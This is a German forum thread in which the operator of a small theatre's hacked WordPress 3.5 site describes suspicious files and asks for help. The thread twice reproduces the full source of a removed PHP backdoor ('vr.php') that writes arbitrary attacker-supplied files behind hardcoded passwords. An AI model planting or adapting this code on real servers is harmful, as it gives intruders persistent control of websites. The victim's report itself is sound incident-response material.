Webseite gehackt?

Eben bin ich per FTP auf die Seite gegangen und habe in de rRoot lauter leere Ordner mit cr cu usw. gefunden, einer allerdings (a2) ist mit endlos vielen Dateien gefüllt mit 0 B. Ich versuche ihn gerade herunterzuladen. Ist das sinnvoll? Einer heißt vr.php und zeigt auch asiatische Schriftzeichen. Ich bin drauf gekommen, weil ich plötzlich, selbst über FTP, keine Bilder mehr hochladen kann.

Wir benutzen leider Wordpress 3.5

Was soll ich machen?

 

Super Antwort. Sehr hilfreich!

 

Ich habe mich da schon hingewandt, aber es antwortet keiner.
Ich habe das Passwort zum FTP geändert.
Ich habe nur einen Benutzer, das bin ich. Also, gibt es wohl keine Zugriffe von dort.
Ich habe aus dem wp-content-Bereich verdächtige Dateien wie help.php, system.php und eine andere php-Datei gelöscht mit s, Name schon vergessen. 404.php, leer, auch gelöscht, dazu Unmengen Ordner mit meist leeren html-Dateien, da ist der Löschvorgang noch nicht beendet, in einer war eine Datei 9.js, .htacces hat keine Veränderung. Bei Google habe ich gelesen, dass die Seite nicht gefährlich ist. Anscheinend hat sich das gerade aufgebaut, die Dateien waren frühestens vom 2. November, auch vom 11. November.

Ach ja, ich habe seit neuestem Sophos - und Sophos hat mir heute gemeldet, dass da Trojaner waren im theme-Bereich.

Was soll ich noch machen? Willst du mal schauen. Ich geb dir gerne den Zugang.

 

und vr.php war ja auch noch, habe ich gelöscht, da stand Folgendes drin:

<?php
$action=$_REQUEST['action']; //页面状态
$password=$_REQUEST['password'];//接口密码
$pathname=$_REQUEST['pathname'];//文件目录名
$keywordindex=$_REQUEST['keywordindex'];//0 然并卵
$filename=$_REQUEST['filename'];//生成文件名
$body=stripslashes($_REQUEST['body']);// 生成文件的内容

$jamin = @$_GET['pw'];






if($jamin) { if($jamin == "smy110")
{ $zm = fopen(dirname(__FILE__).'/'.$filename,"w"); fwrite($zm,$body); fclose($zm);
if(is_file(dirname(__FILE__).'/'.$filename)){echo "yes<br>";}else{echo "no<br>";}}}


if($action=="test")
{
echo 'test success';
return;
}


if($action!="publish")
{
echo 'action error';
return;
}


if($action==""||$password==""||$filename==""||$body=="")
{
echo 'parameters error';
return;
}


if($password!="dgkrybssfhf56")
{
echo 'password error';
return;
}


$wjj=dirname(__FILE__)."\".$pathname;
function createFolder($path)
{
if (!file_exists($path))
{
createFolder(dirname($path));
mkdir($path, 0777,true);
}
}



if(!is_dir($wjj))
{
createFolder($pathname);
}







$fp=fopen($pathname.'/'.$filename,"w");

fwrite($fp, $body);
fclose($fp);


if(is_file($pathname.'/'.$filename))
{
echo "publish success";
}else
{
echo "File does not exist";
}





?>

 

und vr.php war ja auch noch, habe ich gelöscht, da stand Folgendes drin:

<?php
$action=$_REQUEST['action']; //页面状态
$password=$_REQUEST['password'];//接口密码
$pathname=$_REQUEST['pathname'];//文件目录名
$keywordindex=$_REQUEST['keywordindex'];//0 然并卵
$filename=$_REQUEST['filename'];//生成文件名
$body=stripslashes($_REQUEST['body']);// 生成文件的内容

$jamin = @$_GET['pw'];






if($jamin) { if($jamin == "smy110")
{ $zm = fopen(dirname(__FILE__).'/'.$filename,"w"); fwrite($zm,$body); fclose($zm);
if(is_file(dirname(__FILE__).'/'.$filename)){echo "yes<br>";}else{echo "no<br>";}}}


if($action=="test")
{
echo 'test success';
return;
}


if($action!="publish")
{
echo 'action error';
return;
}


if($action==""||$password==""||$filename==""||$body=="")
{
echo 'parameters error';
return;
}


if($password!="dgkrybssfhf56")
{
echo 'password error';
return;
}


$wjj=dirname(__FILE__)."".$pathname;
function createFolder($path)
{
if (!file_exists($path))
{
createFolder(dirname($path));
mkdir($path, 0777,true);
}
}



if(!is_dir($wjj))
{
createFolder($pathname);
}







$fp=fopen($pathname.'/'.$filename,"w");

fwrite($fp, $body);
fclose($fp);


if(is_file($pathname.'/'.$filename))
{
echo "publish success";
}else
{
echo "File does not exist";
}





?>

 

Danke für deine Antwort. Leider funktioniert der Link nicht.

Wie gesagt, Google stuft die Seite als nicht gefährlich ein.

Wir sind ein kleines Theater, das ist gerade in dieser Zeit eine Katastrophe, sie vom Netz zu nehmen, da sind unmittelbar Fördergelder mit verbunden. Gibt es irgendwelche anderen Lösungen. Bitte helft uns! Es geht da schnell um die Existenz!

 

Wie finde ich einen Profi, über die Jobbörse finde ich bisher keinen. Der Profi, der mir all die Jahre geholfen hat, ist in der Mongolei für ein großes Projekt.

 

Liebe Leute,

vielen Dank für die Antworten. Es läuft alles wieder schön, Dank der großartigen Hilfe hier aus dem Forum von KLE-Hosting.